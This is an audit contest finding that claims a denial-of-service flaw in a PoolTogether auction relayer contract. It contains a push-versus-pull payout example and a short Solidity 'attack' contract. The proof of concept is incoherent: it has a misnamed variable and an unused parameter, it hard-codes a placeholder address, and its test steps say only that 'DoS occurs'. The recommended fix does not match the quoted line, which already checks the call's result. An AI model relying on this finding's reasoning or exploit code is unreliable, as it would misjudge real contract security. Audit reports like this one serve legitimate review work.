Code4rena: CODE423N4:2023-08-POOLTOGETHER-FINDINGS-ISSUES-127
Aug 07, 2023

[M-02] Denial of Service on failed call Dos


Lines of code

Vulnerability details

Impact

External calls can fail accidentally or deliberately, which can cause a DoS condition in the contract. To minimize the damage caused by such failures, it is better to isolate each external call into its own transaction that can be initiated by the recipient of the call. This is especially relevant for payments, where it is better to let users withdraw funds rather than push funds to them automatically (this also reduces the chance of problems with the gas limit).
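The push-versus-pull distinction described above, as an added example (not code from the finding or from pt-v5-draw-auction). The contract `RewardPayout` and every name in it are hypothetical, and the funding scenario is constructed for illustration.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

// Added illustration: hypothetical contract, not part of pt-v5-draw-auction.
contract RewardPayout {
    address[] public recipients;
    mapping(address => uint256) public owed;
    mapping(address => bool) private listed;

    error TransferFailed(address recipient, bytes returnData);

    // Constructed scenario: anyone can credit a reward to a recipient.
    function fund(address recipient) external payable {
        if (!listed[recipient]) {
            listed[recipient] = true;
            recipients.push(recipient);
        }
        owed[recipient] += msg.value;
    }

    // Push form: all payouts share one transaction. If a single recipient's
    // receive/fallback reverts, `success` is false, the revert undoes every
    // earlier payout in the loop, and nobody can be paid through this path.
    // The unbounded loop can also exceed the block gas limit.
    function pushAll() external {
        for (uint256 i = 0; i < recipients.length; i++) {
            address recipient = recipients[i];
            uint256 amount = owed[recipient];
            owed[recipient] = 0;
            (bool success, bytes memory returnData) = recipient.call{value: amount}("");
            if (!success) revert TransferFailed(recipient, returnData);
        }
    }

    // Pull form: each recipient initiates its own external call, so a failing
    // call only reverts that recipient's transaction and leaves the others
    // free to withdraw.
    function withdraw() external {
        uint256 amount = owed[msg.sender];
        owed[msg.sender] = 0; // update state before the external call
        (bool success, bytes memory returnData) = msg.sender.call{value: amount}("");
        if (!success) revert TransferFailed(msg.sender, returnData);
    }
}
```

In both functions the result of the low-level `call` is checked; the difference is only in how far a failed call's revert reaches.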

Proof of Concept


https://github.com/GenerationSoftware/pt-v5-draw-auction/blob/f1c6d14a1772d6609de1870f8713fb79977d51c1/src/RngAuctionRelayerDirect.sol#L39
        (bool success, bytes memory returnData) = address(_rngAuctionRelayListener).call(data);


// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

import "/2023-08-pooltogether/pt-v5-draw-auction/src/RngAuctionRelayerDirect.sol";
import "/2023-08-pooltogether/pt-v5-draw-auction/src/interfaces/IRngAuctionRelayListener.sol";

contract AttackRngAuctionRelayerDirect {

    // Despite its name, this holds the RngAuctionRelayerDirect contract under test.
    RngAuctionRelayerDirect public rngAuctionRelayListener;

    // Constructor visibility is ignored since Solidity 0.7, so `public` is dropped.
    constructor(RngAuctionRelayerDirect _rngAuctionRelayListener) payable {
        rngAuctionRelayListener = RngAuctionRelayerDirect(_rngAuctionRelayListener);
    }

    // Calls relay() on the stored relayer, passing the hard-coded address as the
    // listener and msg.sender as the second argument. The function parameter is
    // not used by the body.
    function attack(RngAuctionRelayerDirect _rngAuctionRelayListener) public payable {
        rngAuctionRelayListener.relay(IRngAuctionRelayListener(0x5B38Da6a701c568545dCfcB03FcB875f56beddC4), msg.sender);
    }

}

NB: Victim address in this test case is 0x5B38Da6a701c568545dCfcB03FcB875f56beddC4
Test Case

  1. Deploy the contract named AttackRngAuctionRelayerDirect.sol at the victim address named RngAuctionRelayerDirect.sol.
  2. Go to the attack button and enter the victim contract address.
  3. Click the attack button.
  4. DoS occurs.

Tools Used

VS Code

Recommended Mitigation Steps

Do not use the call function.
Use the require function on the call.

Assessed type

DoS

